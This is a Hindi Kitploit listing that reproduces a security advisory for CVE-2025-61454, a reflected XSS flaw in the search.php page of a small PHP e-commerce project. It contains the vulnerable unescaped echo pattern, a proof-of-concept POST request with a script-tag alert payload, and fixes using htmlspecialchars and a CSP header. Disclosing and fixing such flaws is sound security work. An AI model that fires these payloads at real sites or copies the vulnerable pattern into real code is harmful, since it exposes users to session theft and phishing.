Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/tansique-17/cve-2025-61454
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubtansique-17/cve-2025-61454

CVE-2025-61454

CVE-2025-61454 के लिए सार्वजनिक प्रकटीकरण और प्रूफ-ऑफ-कॉन्सेप्ट, जो E-commerce Project v1.0 के search.php में एक reflected XSS भेद्यता है, जिसमें शोषण के चरण और उपचार मार्गदर्शन शामिल हैं।

रिपॉजिटरी देखेंवेबसाइट
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ CVE प्रकटीकरण: CVE-2025-61454 — ई-कॉमर्स प्रोजेक्ट में रिफ्लेक्टेड XSS

प्रकटीकरण तिथि: 14 अक्टूबर 2025
CVE ID: CVE-2025-61454
गंभीरता: मध्यम (CVSS 6.1)


🧩 सारांश

E-commerce Project v1.0 में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है, विशेष रूप से search.php एंडपॉइंट के भीतर। search पैरामीटर में अनसैनिटाइज़्ड इनपुट सीधे प्रतिक्रिया HTML में वापस परावर्तित होता है, जिससे हमलावर उस उपयोगकर्ता के ब्राउज़र में मनमाना JavaScript निष्पादित कर सकते हैं जो किसी दुर्भावनापूर्ण लिंक पर जाता है या एक क्राफ्टेड अनुरोध सबमिट करता है।

इस मुद्दे को पहचानकर्ता CVE-2025-61454 सौंपा गया है। प्रकटीकरण के समय, विक्रेता द्वारा कोई पैच जारी नहीं किया गया है।


📦 प्रभावित उत्पाद

  • विक्रेता: स्वतंत्र (Bhabishya-123)
  • प्रोजेक्ट: E-commerce
  • संस्करण: v1.0
  • फ़ाइल: search.php
  • संवेदनशील एंडपॉइंट:
    http://localhost/e-commerce-main/search.php

🔬 भेद्यता विवरण

सर्वर प्रतिक्रिया HTML में परावर्तित करने से पहले POST डेटा से search पैरामीटर को ठीक से सैनिटाइज़ करने में विफल रहता है। यह हमलावरों को JavaScript पेलोड इंजेक्ट करने की अनुमति देता है, जिससे क्लाइंट-साइड कोड निष्पादन होता है।

एक हमलावर एम्बेडेड स्क्रिप्ट-जैसी सामग्री वाला इनपुट तैयार करता है और इसे संवेदनशील POST एंडपॉइंट पर भेजता है। चूंकि सर्वर उचित HTML/विशेषता/JS एन्कोडिंग लागू किए बिना इनपुट को HTML प्रतिक्रिया में परावर्तित करता है, ब्राउज़र परावर्तित सामग्री को निष्पादन योग्य मार्कअप के रूप में मानता है और उसे चलाता है। यह एक रिफ्लेक्टेड (गैर-स्थायी) XSS परिदृश्य है; हमलावर को पीड़ित को अनुरोध करने या विशेष रूप से निर्मित लिंक/फ़ॉर्म पर जाने के लिए राजी करना होगा।

संवेदनशील कोड पैटर्न (काल्पनिक):

root@kitploit:~
$search = $_POST['search'];
echo "<div>Search results for: $search</div>";

📌 CWE वर्गीकरण

CWE IDशीर्षक
CWE-79वेब पेज जनरेशन के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन ('क्रॉस-साइट स्क्रिप्टिंग')

📊 CVSS v3.1 स्कोर

स्कोरगंभीरतावेक्टर स्ट्रिंग
6.1मध्यमCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

💥 प्रभाव

सफल शोषण के परिणामस्वरूप निम्न हो सकते हैं:

  • 🧠 मनमाना JavaScript का निष्पादन
  • 🎭 HTML इंजेक्शन के माध्यम से फ़िशिंग या प्रतिरूपण
  • 🍪 सत्र अपहरण या टोकन चोरी
  • 🚨 जबरन पुनर्निर्देशन या मैलवेयर वितरण
  • 🎣 नकली लॉगिन फ़ॉर्म के माध्यम से क्रेडेंशियल संग्रह
  • 📊 खोज परिणाम पृष्ठ की विकृति

🧪 प्रमाण की अवधारणा (PoC)

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/Bhabishya-123/E-commerce.git

2. स्थानीय रूप से होस्ट करें

प्रोजेक्ट को तैनात करने और एप्लिकेशन तक पहुंचने के लिए XAMPP/LAMP का उपयोग करें।

3. भेद्यता का शोषण करें

📥 नमूना अनुरोध

root@kitploit:~
POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded

search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=

📋 डिकोडेड पेलोड

root@kitploit:~
search=yxo9p<script>alert(1)</script>xnzmd&submit=

📋 इंजेक्टेड पेलोड

root@kitploit:~
yxo9p<script>alert(1)</script>xnzmd

स्पष्टीकरण:
पेलोड <script>alert(1)</script> खोज पैरामीटर के भीतर एम्बेडेड है। जब कोई पीड़ित इस दुर्भावनापूर्ण पेलोड के साथ खोज फ़ॉर्म सबमिट करता है (या सोशल इंजीनियरिंग के माध्यम से ऐसा करने के लिए धोखा दिया जाता है), तो JavaScript उनके ब्राउज़र संदर्भ में निष्पादित होता है।

4. अपेक्षित परिणाम

यदि संवेदनशील है, तो ब्राउज़र JavaScript कोड निष्पादित करेगा, जिसमें मान 1 के साथ एक अलर्ट बॉक्स प्रदर्शित होगा। यह सफल XSS शोषण की पुष्टि करता है।


🔐 अनुशंसाएँ

  • ✅ HTML में रेंडर करने से पहले सभी अविश्वसनीय आउटपुट को एन्कोड करने के लिए htmlspecialchars() या समकक्ष का उपयोग करें।
  • 🧰 सभी फ़ॉर्म इनपुट के लिए सर्वर-साइड इनपुट सत्यापन लागू करें, विशेष रूप से खोज पैरामीटर के लिए।
  • 🧱 इनलाइन स्क्रिप्ट निष्पादन को रोकने के लिए मजबूत सामग्री सुरक्षा नीति (CSP) हेडर सेट करें।
  • 🚫 अनसैनिटाइज़्ड उपयोगकर्ता इनपुट को सीधे HTML प्रतिक्रियाओं में एम्बेड करने से बचें।
  • 🔒 संदर्भ (HTML, JavaScript, URL, CSS) के आधार पर उचित आउटपुट एन्कोडिंग लागू करें।
  • 🛡️ स्वचालित XSS सुरक्षा प्रदान करने वाले आधुनिक फ्रेमवर्क का उपयोग करें।

✅ उदाहरण फिक्स

root@kitploit:~
$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";

🛡️ सामग्री सुरक्षा नीति उदाहरण

root@kitploit:~
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'

📆 समयरेखा

घटनातिथि
भेद्यता की खोज16 सितंबर 2025
सार्वजनिक प्रकटीकरण13 अक्टूबर 2025
पैच उपलब्ध❌ प्रकटीकरण के अनुसार उपलब्ध नहीं

🙋‍♂️ श्रेय

यह भेद्यता निम्न द्वारा खोजी और प्रकट की गई थी:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 संदर्भ

  • OWASP - XSS
  • CWE-79 - XSS वर्गीकरण
  • PortSwigger - क्रॉस-साइट स्क्रिप्टिंग
  • CVE.org पर CVE-2025-61454

💬 यह सलाह आधिकारिक विक्रेता पैच की अनुपस्थिति के कारण स्वतंत्र रूप से प्रकाशित की गई है।

टूल डाउनलोड करें